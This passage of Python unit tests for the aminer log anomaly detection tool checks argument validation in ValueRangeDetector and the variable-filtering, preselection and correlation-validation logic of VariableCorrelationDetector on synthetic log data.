ValueRangeDetector(self.aminer_config, [self.stream_printer_event_handler], ["Default"], output_logline=True) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], ignore_list="") self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], ignore_list=b"Default") self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], ignore_list=True) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], ignore_list=123) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], ignore_list=123.22) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], ignore_list={"id": "Default"}) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], ignore_list="Default") self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], ignore_list=()) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], ignore_list=set()) ValueRangeDetector(self.aminer_config, [self.stream_printer_event_handler], ["Default"], ignore_list=["Default"]) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], constraint_list="") self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], constraint_list=b"Default") self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], constraint_list=True) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], constraint_list=123) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], constraint_list=123.22) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], constraint_list={"id": "Default"}) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], constraint_list="Default") self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], constraint_list=()) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], constraint_list=set()) ValueRangeDetector(self.aminer_config, [self.stream_printer_event_handler], ["Default"], constraint_list=["Default"]) self.assertRaises(ValueError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], learn_mode=True, stop_learning_time=-1) self.assertRaises(ValueError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], learn_mode=True, stop_learning_time=0) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], learn_mode=True, stop_learning_time=b"Default") self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], learn_mode=True, stop_learning_time="123") self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], learn_mode=True, stop_learning_time={"id": "Default"}) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], learn_mode=True, stop_learning_time=["Default"]) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], learn_mode=True, stop_learning_time=[]) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], learn_mode=True, stop_learning_time=()) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], learn_mode=True, stop_learning_time=set()) ValueRangeDetector(self.aminer_config, [self.stream_printer_event_handler], ["Default"], learn_mode=True, stop_learning_time=100) ValueRangeDetector(self.aminer_config, [self.stream_printer_event_handler], ["Default"], learn_mode=True, stop_learning_time=100.22) self.assertRaises(ValueError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], learn_mode=True, stop_learning_no_anomaly_time=-1) self.assertRaises(ValueError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], learn_mode=True, stop_learning_no_anomaly_time=0) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], learn_mode=True, stop_learning_no_anomaly_time=b"Default") self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], learn_mode=True, stop_learning_no_anomaly_time="123") self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], learn_mode=True, stop_learning_no_anomaly_time={"id": "Default"}) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], learn_mode=True, stop_learning_no_anomaly_time=["Default"]) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], learn_mode=True, stop_learning_no_anomaly_time=[]) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], learn_mode=True, stop_learning_no_anomaly_time=()) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], learn_mode=True, stop_learning_no_anomaly_time=set()) ValueRangeDetector(self.aminer_config, [self.stream_printer_event_handler], ["Default"], learn_mode=True, stop_learning_no_anomaly_time=100) ValueRangeDetector(self.aminer_config, [self.stream_printer_event_handler], ["Default"], learn_mode=True, stop_learning_no_anomaly_time=100.22) self.assertRaises(ValueError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], learn_mode=True, stop_learning_time=100, stop_learning_no_anomaly_time=100) self.assertRaises(ValueError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], log_resource_ignore_list=["/tmp/syslog"]) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], log_resource_ignore_list="") self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], log_resource_ignore_list=b"Default") self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], log_resource_ignore_list=True) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], log_resource_ignore_list=123) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], log_resource_ignore_list=123.22) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], log_resource_ignore_list={"id": "Default"}) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], log_resource_ignore_list=()) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], log_resource_ignore_list=set()) ValueRangeDetector(self.aminer_config, [self.stream_printer_event_handler], ["Default"], log_resource_ignore_list=["file:///tmp/syslog"]) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/analysis/VariableCorrelationDetectorTest.py000066400000000000000000003446011500476301700324460ustar00rootroot00000000000000from aminer.analysis.EventTypeDetector import EventTypeDetector from aminer.analysis.VariableTypeDetector import VariableTypeDetector from aminer.analysis.VariableCorrelationDetector import VariableCorrelationDetector from aminer.input.LogAtom import LogAtom from aminer.parsing.ParserMatch import ParserMatch from aminer.parsing.MatchElement import MatchElement from unit.TestBase import TestBase from aminer.AminerConfig import DEFAULT_PERSISTENCE_PERIOD import time import random from copy import deepcopy class VariableCorrelationDetectorTest(TestBase): """This class containts unittests for the VariableCorrelationDetector.""" iterations = 20 dataset_size = 100 significance_niveau = 0.05 def test1filter_variables_with_vtd(self): """This test case checks if the variables are filtered accurately using the VariableTypeDetector.""" self.filter_variables(True) def test2filter_variables_without_vtd(self): """This test case checks if the variables are filtered accurately without using the VariableTypeDetector.""" self.filter_variables(False) def filter_variables(self, use_vtd): """Run the filter variables code with or without the VariableTypeDetector.""" t = time.time() stat_data = b"5.3.0-55-generic" log_atom = LogAtom(stat_data, ParserMatch(MatchElement(None, stat_data, stat_data, None)), t, self.__class__.__name__) etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) if use_vtd: vtd = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=self.dataset_size, div_thres=0.1, test_gof_int=True, sim_thres=0.3, gof_alpha=self.significance_niveau) vcd = VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.1) for _ in range(self.dataset_size): etd.receive_atom(log_atom) if use_vtd: vtd.receive_atom(log_atom) vcd.init_cor(0) # the vcd should not learn any correlations in static data. self.assertEqual(vcd.pos_var_val, [[]]) etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) if use_vtd: vtd = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=self.dataset_size, div_thres=0.1, test_gof_int=False, sim_thres=0.5, gof_alpha=self.significance_niveau) vcd = VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.1) for i in range(self.dataset_size): stat_data = bytes(str((i % 60) * 0.1), "utf-8") log_atom = LogAtom(stat_data, ParserMatch(MatchElement("/", stat_data, stat_data, None)), t, self.__class__.__name__) etd.receive_atom(log_atom) if use_vtd: vtd.receive_atom(log_atom) vcd.init_cor(0) # the vcd should not learn any correlations in others data. self.assertEqual(vcd.pos_var_val, [[]]) etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) if use_vtd: vtd = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=self.dataset_size, div_thres=0.1, test_gof_int=True, sim_thres=0.3, gof_alpha=self.significance_niveau) vcd = VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.1) values = [] for i in range(self.dataset_size): stat_data = bytes(str((i % 10) * 0.1), "utf-8") values.append(float(stat_data)) log_atom = LogAtom(stat_data, ParserMatch(MatchElement("/", stat_data, stat_data, None)), t, self.__class__.__name__) etd.receive_atom(log_atom) if use_vtd: vtd.receive_atom(log_atom) vcd.init_cor(0) values_set = list(set(values)) # the vcd should learn any correlations in discrete data. self.assertEqual(vcd.pos_var_val, [[values_set]]) etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) if use_vtd: vtd = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=self.dataset_size, div_thres=0.1, test_gof_int=True, sim_thres=0.3, gof_alpha=self.significance_niveau) vcd = VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.1) values = [] for i in range(self.dataset_size): stat_data = bytes(str((i % 11) * 0.1), "utf-8") values.append(float(stat_data)) log_atom = LogAtom(stat_data, ParserMatch(MatchElement(None, stat_data, stat_data, None)), t, self.__class__.__name__) etd.receive_atom(log_atom) if use_vtd: vtd.receive_atom(log_atom) vcd.init_cor(0) # the vcd should not learn any correlations if the discrete data is not in the threshold. self.assertEqual(vcd.pos_var_val, [[]]) def test3initialize_variables_with_matchDiscDistr_preselection_method(self): """This test case checks the functionality of the matchDiscDistr preselection method.""" etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vcd = VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.1) values_list1 = [1.0/10]*10 values_list2 = [1.0/14]*14 # an correlation should be detected even if the second list contains more values than the first. self.assertTrue(vcd.pick_cor_match_disc_distr(values_list1, values_list2)) values_list2 = [1.0/7]*7 # an correlation should be detected even if the second list contains less values than the first. self.assertTrue(vcd.pick_cor_match_disc_distr(values_list1, values_list2)) values_list2 = [1.0/30]*30 # an correlation should not be detected if the probability of occurrence difference is too high. self.assertFalse(vcd.pick_cor_match_disc_distr(values_list1, values_list2)) values_list2 = [0.2] + [0.8/9]*9 # an correlation should not be detected if the probability of occurrence difference is too high. self.assertFalse(vcd.pick_cor_match_disc_distr(values_list1, values_list2)) # find correlations even when the lists are randomly shuffled. values_list1 = [0.3]*2 + [0.4/3]*3 values_list2 = [1.0/5] * 5 random.shuffle(values_list1) self.assertTrue(vcd.pick_cor_match_disc_distr(values_list1, values_list2)) def test4initialize_variables_with_excludeDueDistr_preselection_method(self): """This test case checks the functionality of the excludeDueDistr preselection method.""" etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vcd = VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.1) # equal distribution - no exclusion expected values = [0.1]*10 self.assertTrue(vcd.pick_cor_exclude_due_distr(values)) # almost equal distribution - no exclusion expected values = [0.3] + [0.078]*9 self.assertTrue(vcd.pick_cor_exclude_due_distr(values)) # one value with high probability - exclusion expected values = [0.5] + [0.056]*9 self.assertFalse(vcd.pick_cor_exclude_due_distr(values)) # multiple values with high probability - no exclusion expected values = [0.3]*3 + [0.014]*7 self.assertTrue(vcd.pick_cor_exclude_due_distr(values)) # check boundaries values = [0.5]*2 self.assertTrue(vcd.pick_cor_exclude_due_distr(values)) values = [0.8, 0.2] self.assertFalse(vcd.pick_cor_exclude_due_distr(values)) values = [0.33]*3 self.assertTrue(vcd.pick_cor_exclude_due_distr(values)) values = [0.7] + [0.15]*2 self.assertFalse(vcd.pick_cor_exclude_due_distr(values)) values = [0.25]*4 self.assertTrue(vcd.pick_cor_exclude_due_distr(values)) values = [0.58] + [0.14]*3 self.assertFalse(vcd.pick_cor_exclude_due_distr(values)) def test5initialize_variables_with_matchDiscVals_preselection_method(self): """ This test case checks the functionality of the matchDiscVals preselection method. This test actually uses values instead of probabilities, but they are similar to the values used in test3. """ etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vcd = VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.1) values_set1 = [i*0.1 for i in range(10)] values_set2 = [i*0.2 for i in range(7)] # an correlation should be detected even if the second list contains less values than the first. self.assertTrue(vcd.pick_cor_match_disc_vals(values_set1, values_set2)) values_set2 = [i*0.3 for i in range(7)] # an correlation should not be detected if too many values are different. self.assertFalse(vcd.pick_cor_match_disc_vals(values_set1, values_set2)) values = [] for i in range(58): stat_data = bytes(str(i * 0.1), "utf-8") values.append(float(stat_data)) values_set1 = values values = [] for i in range(41): stat_data = bytes(str(i * 0.2), "utf-8") values.append(float(stat_data)) values_set2 = values # an correlation should be detected if not too many values are different. self.assertTrue(vcd.pick_cor_match_disc_vals(values_set1, values_set2)) values = [] for i in range(42): stat_data = bytes(str(i * 0.2), "utf-8") values.append(float(stat_data)) values_set2 = values # an correlation should not be detected if too many values are different. self.assertFalse(vcd.pick_cor_match_disc_vals(values_set1, values_set2)) def test6initialize_variables_with_random_preselection_method(self): """ This test case checks the functionality of the random preselection method. It tests all percentage_random_cors in [0.01..1.0[. For all paths the possible amount of combinations is 10. The expected number of correlations is rounded. For example with 0.05 <= percentage_random_cors < 0.15 exactly one combination is expected. The combinations also must not be repeated reversed and combinations with itself are not allowed. The used discrete data is for every path the same. """ t = time.time() etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vcd = VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.1, used_presel_meth=["random"]) values = [] for i in range(self.dataset_size): stat_data = bytes(str((i % 10) * 0.1), "utf-8") values.append(float(stat_data)) children = [MatchElement(str(j), stat_data, stat_data, None) for j in range(5)] log_atom = LogAtom(stat_data, ParserMatch(MatchElement("/", str(i).encode(), str(i).encode(), children)), t, self.__class__.__name__) etd.receive_atom(log_atom) vcd.init_cor(0) # test random correlation picking by using vcd.percentage_random_cors [0.01..1.0[ for i in range(1, 100): vcd.percentage_random_cors = i / 100 # out of 10 possible combinations exactly x should occur. x = i // 10 + (i % 10 >= 5) correlations = vcd.pick_cor_random(0) self.assertEqual(len(correlations), x, "Error at i = %d" % i) for corr in correlations: # one path must not correlate with itself. self.assertNotEqual(corr[0], corr[1]) # the same, reversed combination must not be in values. self.assertFalse([corr[1], corr[0]] in correlations) # test if a ValueError is raised when percentage_random_cors is out of range. self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.1, used_presel_meth=["random"], percentage_random_cors=1.2) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.1, used_presel_meth=["random"], percentage_random_cors=1.0) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.1, used_presel_meth=["random"], percentage_random_cors=0.0) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.1, used_presel_meth=["random"], percentage_random_cors=-1.2) def test7initialize_variables_with_intersect_presel_meth(self): """ This test case checks the functionality of the intersect_presel_meth flag with multiple preselection methods. These are "excludeDueDistr" and "matchDiscVals". In the first case intersect_presel_meth=False and correlations can be detected successfully. In the second case intersect_presel_meth=True and no correlations are found because they are excluded in "excludeDueDistr". """ t = time.time() etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vcd_union = VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.1, used_presel_meth=["excludeDueDistr", "matchDiscVals"], intersect_presel_meth=False) vcd_intersection = VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.5, used_presel_meth=["excludeDueDistr", "matchDiscVals"], intersect_presel_meth=True) vcd_exclude = VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.1, used_presel_meth=["excludeDueDistr"]) vcd_match = VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.1, used_presel_meth=["matchDiscVals"]) var1 = ["a"]*50 + ["b"]*50 var2 = ["a"]*90 + ["b"]*10 var3 = ["c"]*20 + ["d"]*50 + ["e"]*30 var4 = ["c"]*50 + ["d"]*50 for i, val in enumerate(var1): children = [MatchElement("2", var2[i].encode(), var2[i].encode(), None), MatchElement("3", var3[i].encode(), var3[i].encode(), None), MatchElement("4", var4[i].encode(), var4[i].encode(), None)] log_atom = LogAtom(val.encode(), ParserMatch(MatchElement("/", val.encode(), val.encode(), children)), t, self.__class__.__name__) etd.receive_atom(log_atom) vcd_union.init_cor(0) vcd_intersection.init_cor(0) vcd_exclude.init_cor(0) vcd_match.init_cor(0) values_set = [[list(set(var1))] + [list(set(var2))] + [list(set(var3))] + [list(set(var4))]] self.assertTrue(sorted(vcd_union.pos_var_val), sorted(values_set)) # intersect_presel_meth=False -> correlations should be found. # the correlation has to be in at least one presel method. (OR-Statement) unique_list = deepcopy(vcd_exclude.pos_var_cor[0]) for cor in vcd_match.pos_var_cor[0]: if cor not in unique_list: unique_list.append(cor) self.assertEqual(len(unique_list), len(vcd_union.pos_var_cor[0])) values_set = [[list(set(var1))] + [list(set(var2))] + [list(set(var3))] + [list(set(var4))]] self.assertTrue(sorted(vcd_intersection.pos_var_val), sorted(values_set)) # intersect_presel_meth=True -> correlations should still be found. # the correlation has to be in both presel methods. (AND-Statement) unique_list = [] for cor in vcd_exclude.pos_var_cor[0]: if cor in vcd_match.pos_var_cor[0] and cor not in unique_list: unique_list.append(cor) for cor in vcd_match.pos_var_cor[0]: if cor in vcd_exclude.pos_var_cor[0] and cor not in unique_list: unique_list.append(cor) self.assertEqual(len(unique_list), len(vcd_intersection.pos_var_cor[0])) def test8initialize_variables_with_no_preselection_method(self): """ This test case checks the selection with no preselection method used. Also this test case checks the functionality of the Rel and WRel methods. For the data generation the main path "/" always contains (i % 10)*1 and child elements contain (i % 10)*1 for half of the time and (i % 10)*2 for the other half. The first half of the data contains 10 different values. These values are not combined with other values like in the second half of the data, which introduces 5 new values. Therefore 15 combinations exist (5+4+3+2+1=15). 10 correlations exist when "/" = i*1 -> child = i*1. In the second half 5 new correlations are added when "/" = i*1 -> child = i*2. """ t = time.time() etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vcd = VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.5, num_init=self.dataset_size) values1 = [] # generate the first half of the data with child elements being (i % 10) * 0.1. for i in range(self.dataset_size // 2): stat_data = bytes(str((i % 10) * 1), "utf-8") values1.append(float(stat_data)) children = [MatchElement(str(0), stat_data, stat_data, None)] log_atom = LogAtom(stat_data, ParserMatch(MatchElement("/", str((i % 10) * 1).encode(), str((i % 10) * 1).encode(), children)), t, self.__class__.__name__) etd.receive_atom(log_atom) values2 = [] # generate the second half of the data with child elements being (i % 10) * 2. for i in range(self.dataset_size // 2): stat_data = bytes(str((i % 10) * 2), "utf-8") values2.append(float(stat_data)) children = [MatchElement(str(0), stat_data, stat_data, None)] log_atom = LogAtom(stat_data, ParserMatch(MatchElement("/", str((i % 10) * 1).encode(), str((i % 10) * 1).encode(), children)), t, self.__class__.__name__) etd.receive_atom(log_atom) vcd.init_cor(0) values_set = list(set(values1 + values2)) pos_var_val = deepcopy(vcd.pos_var_val) # all child elements should contain data from values1 and values2. index = pos_var_val[0].index(values_set) del pos_var_val[0][index] # no other element should contain the united set of values1 and values2. self.assertRaises(ValueError, pos_var_val[0].index, values_set) # only values1 should be found, because the main path contains only data generated with (i % 10) * 1. self.assertEqual(pos_var_val, [[list(set(values1))]]) # test the functionality of the Rel and WRel methods # copy both lists to not modify the actual lists of the vcd. rel_list = deepcopy(vcd.rel_list) w_rel_list = deepcopy(vcd.w_rel_list) for rel in rel_list[0]: for r in rel: step = 2 for i in range(len(r)): key = (i % 20 >= 10)*10 + ((i % 10) * step) # search for the key k in the relation r or convert key to float if applicable. for k in r: if key == 0.0: break if k != 0.0 and k % key == 0: key = k break value = r[key] # there is no difference between the first half and the second half of the data, when value = 0. if key == 0.0: self.assertEqual({key: 10}, value) # as the Rel method can learn only one relation, the values should be 2, 4, 6 and 8 when the key is divisible # by 2 and smaller than 10. elif key % 2 == 0 and key < 10.0: self.assertEqual({key: 4}, value) # as the Rel method can learn only one relation, the values should be 2, 4, 6 and 8 when the key is divisible # by 2 and greater or equal 10. elif key % 2 == 0: self.assertEqual({(key/2): 5}, value) else: raise ValueError("The %f: %f combination must not occur in Rel." % (key, value)) # relations should be found in both directions and the count should be equal. cnt_half = 0 # for example key = 18.0 -> inner key = 9.0 cnt_double = 0 # for example key = 9.0 -> inner key = 18.0 for w_rel in w_rel_list[0]: for r in w_rel: step = 1.0 # search for the step size for k in r: if k >= 10.0: step = 2.0 if step == 1.0: cnt_half += 1 else: cnt_double += 1 for i in range(len(r)): key = (i % 20 >= 10)*10 + ((i % 10) * step) value = r[key] # there is no difference between the first half and the second half of the data, when value = 0. if key == 0.0: self.assertEqual({key: 10}, value) # this if is only reached when step = 2.0. elif key >= 10.0: self.assertEqual({key/2: 5}, value) elif step == 1.0: self.assertEqual({key*2: 5, key: 5}, value) elif step == 2.0: self.assertEqual({key/2: 5, key: 5}, value) else: raise ValueError("The %f: %f combination must not occur in WRel." % (key, value)) self.assertEqual(cnt_half, 1) self.assertEqual(cnt_double, 1) def test9nonexistent_preselection_methods(self): """This test case checks if an error occurs, when using an nonexistent preselection method.""" etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.1, used_presel_meth=["nonexistentPreselMeth"]) def test10nonexistent_correlation_methods(self): """This test case checks if an error occurs, when using an nonexistent correlation method or empty list.""" etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.1, used_cor_meth=["nonexistentCorDMeth"]) def test11validate_correlation_rules_coverVals(self): """ This test case checks the functionality of the coverVals validation method. The validate_cor_cover_vals_thres is tested in the interval [0.1..1.0]. The data consists mostly of (i % 10) * 1 and every 7th value the child elements use (i % 10) * 2 as the condition (i % 7 == 0 and i != 0) is met. Comparing the count of values with h*10, as h is used to get the steps with 10%. If the count is smaller than h*10, no value must be found. """ t = time.time() # run test for every 10% of validate_cor_cover_vals_thres for h in range(1, 11, 1): etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vcd = VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.5, used_validate_cor_meth=["coverVals"], validate_cor_cover_vals_thres=0.7, num_init=self.dataset_size) # set new validate_cor_cover_vals_thres vcd.validate_cor_cover_vals_thres = h*0.1 # init and validate. This is needed as the ETD also needs to be initialized. for i in range(self.dataset_size): stat_data = str((i % 10)).encode() children = [MatchElement(str(0), stat_data, stat_data, None)] log_atom = LogAtom(stat_data, ParserMatch(MatchElement("/", stat_data, stat_data, children)), t, self.__class__.__name__) etd.receive_atom(log_atom) vcd.init_cor(0) vcd.rel_list = [[[{9.0: {9.0: 26}, 16.0: {16.0: 13}}, {9.0: {9.0: 26}, 16.0: {16.0: 13}}]]] vcd.w_rel_list = [[[{9.0: {9.0: 26}, 16.0: {16.0: 13, 8.0: 5}}, {9.0: {9.0: 26}, 16.0: {16.0: 13, 8.0: 5}}]]] vcd.pos_var_cor = [[[0, 1]]] old_rel_list = deepcopy(vcd.rel_list[0]) old_w_rel_list = deepcopy(vcd.w_rel_list[0]) vcd.validate_cor() self.assertEqual(len(old_rel_list), len(vcd.rel_list[0])) self.assertEqual(len(old_w_rel_list), len(vcd.w_rel_list[0])) for i, rel in enumerate(vcd.rel_list[0]): for r in old_rel_list[i]: cnt = 0 for key in r: for val in r[key]: cnt += r[key][val] # when the count is smaller than validate_cor_cover_vals_thres in percent, then there should not be any correlations. # h must be multiplied by 10 as it represents 10% steps. if cnt < h * 10: for val in rel: self.assertEqual({}, val) else: self.assertEqual(vcd.rel_list[0], old_rel_list) for i, rel in enumerate(vcd.w_rel_list[0]): for r in old_w_rel_list[i]: cnt = 0 for key in r: for val in r[key]: cnt += r[key][val] # when the count is smaller than validate_cor_cover_vals_thres in percent, then there should not be any correlations. # h must be multiplied by 10 as it represents 10% steps. if cnt < h * 10: for val in rel: self.assertEqual({}, val) else: self.assertEqual(vcd.w_rel_list[0], old_w_rel_list) def test12validate_correlation_rules_distinctDistr(self): """ This test case checks the functionality of the distinctDistr validation method. The first collection of datasets is similar and therefore produces more correlations. The second collection of datasets is not so similar and the number of correlations is smaller. The expected correlations can not be compared directly, because the order of the correlations is not guaranteed with the distinctDistr validation method. To achieve the equality test, both correlation variables are compared to [[], [], []] after all existing correlations are removed. """ t = time.time() etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vcd = VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.1, used_validate_cor_meth=["distinctDistr"], validate_cor_distinct_thres=0.05, num_init=self.dataset_size) # init and validate similar_data1 = [b"a"]*50 + [b"b"]*20 + [b"c"]*25 + [b"d"]*5 similar_data2 = [b"a"]*45 + [b"b"]*25 + [b"c"]*15 + [b"d"]*10 + [b"e"]*5 similar_data3 = [b"a"]*55 + [b"b"]*15 + [b"c"]*20 + [b"d"]*10 unsimilar_data1 = [b"a"]*50 + [b"b"]*20 + [b"c"]*25 + [b"d"]*5 unsimilar_data2 = [b"a"]*10 + [b"b"]*15 + [b"c"]*15 + [b"d"]*10 + [b"e"]*50 unsimilar_data3 = [b"a"]*25 + [b"b"]*15 + [b"c"]*50 + [b"d"]*10 for i in range(self.dataset_size): children = [MatchElement(str(1), similar_data2[i], similar_data2[i], None), MatchElement(str(2), similar_data3[i], similar_data3[i], None)] log_atom = LogAtom(str(similar_data1).encode(), ParserMatch(MatchElement("/", similar_data1[i], similar_data1[i], children)), t, self.__class__.__name__) etd.receive_atom(log_atom) vcd.init_cor(0) old_w_rel_list = deepcopy(vcd.w_rel_list[0]) vcd.validate_cor() self.assertEqual(len(old_w_rel_list), len(vcd.w_rel_list[0])) expected_similar_correlations = [[{ "d": {"e": 5}, "c": {"d": 10, "c": 15}, "b": {"b": 20}, "a": {"b": 5, "a": 45}}, { "e": {"d": 5}, "d": {"c": 10}, "c": {"c": 15}, "b": {"b": 20, "a": 5}, "a": {"a": 45}}], [{ "d": {"d": 5}, "c": {"d": 5, "c": 20}, "b": {"b": 15, "a": 5}, "a": {"a": 50}}, { "d": {"d": 5, "c": 5}, "c": {"c": 20}, "b": {"b": 15}, "a": {"b": 5, "a": 50}}], [{ "e": {"d": 5}, "d": {"d": 5, "c": 5}, "c": {"c": 15}, "b": {"b": 15, "a": 10}, "a": {"a": 45}}, {"d": {"e": 5, "d": 5}, "c": {"d": 5, "c": 15}, "b": {"b": 15}, "a": {"b": 10, "a": 45}}]] for w_rel in vcd.w_rel_list[0]: for cor in w_rel: deleted = False for expected_similar_correlation in expected_similar_correlations: if cor in expected_similar_correlation: index = expected_similar_correlation.index(cor) del expected_similar_correlation[index] deleted = True break # if the correlation was not deleted an error is raised and the test fails. if not deleted: raise ValueError("Correlation %s could not be found in the WRel List." % cor) self.assertEqual([[], [], []], expected_similar_correlations) etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vtd = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=self.dataset_size, div_thres=0.1, test_gof_int=True, sim_thres=0.1, gof_alpha=self.significance_niveau) vcd = VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.1, used_validate_cor_meth=["distinctDistr"], 